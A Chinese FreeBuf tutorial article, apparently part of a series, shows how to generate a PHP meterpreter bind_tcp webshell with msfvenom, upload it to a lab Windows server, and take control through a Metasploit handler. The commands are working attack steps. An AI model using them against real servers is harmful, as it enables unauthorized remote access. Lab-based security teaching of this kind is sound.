freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

webshell脚本操作介绍(4)
2020-09-14 22:58:45

MSF连接小马

一. 概述

metasploit框架中其实也自带了php的后门,并且配合meterpreter功能强大。

bind_tcp:在这里黑客主动去连接目标主机,就叫作正向连接。适用的情况是服务器在外网的情况
reverse_tcp:在这个例子中反向连接就是被入侵的主机反过来来连接黑客,就叫作反向连接,在目标服务器在内网或有防火墙的情况下使用。

二. 环境

软件版本解释
Kali Linux2019IP : 10.1.1.220
Windows server 2008R2IP : 10.1.1.251
PHPStudyPHP5.4.45-nts+ApacheWindows系统中

二. 实验步骤

1. 生成小马

msfvenom -p php/meterpreter/bind_tcp lhost=10.1.1.220 lport=55555 -o msf.php

2. 上传至服务器

3. 配置Kali管理会话

msfconsole

use exploit/multi/handler

set payload php/meterpreter/bind_tcp

set LPORT 55555
set RHOST 10.1.1.251
exploit

手动在浏览器中浏览小马地址,人为触发连接事件

连接成功.

# webshell
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者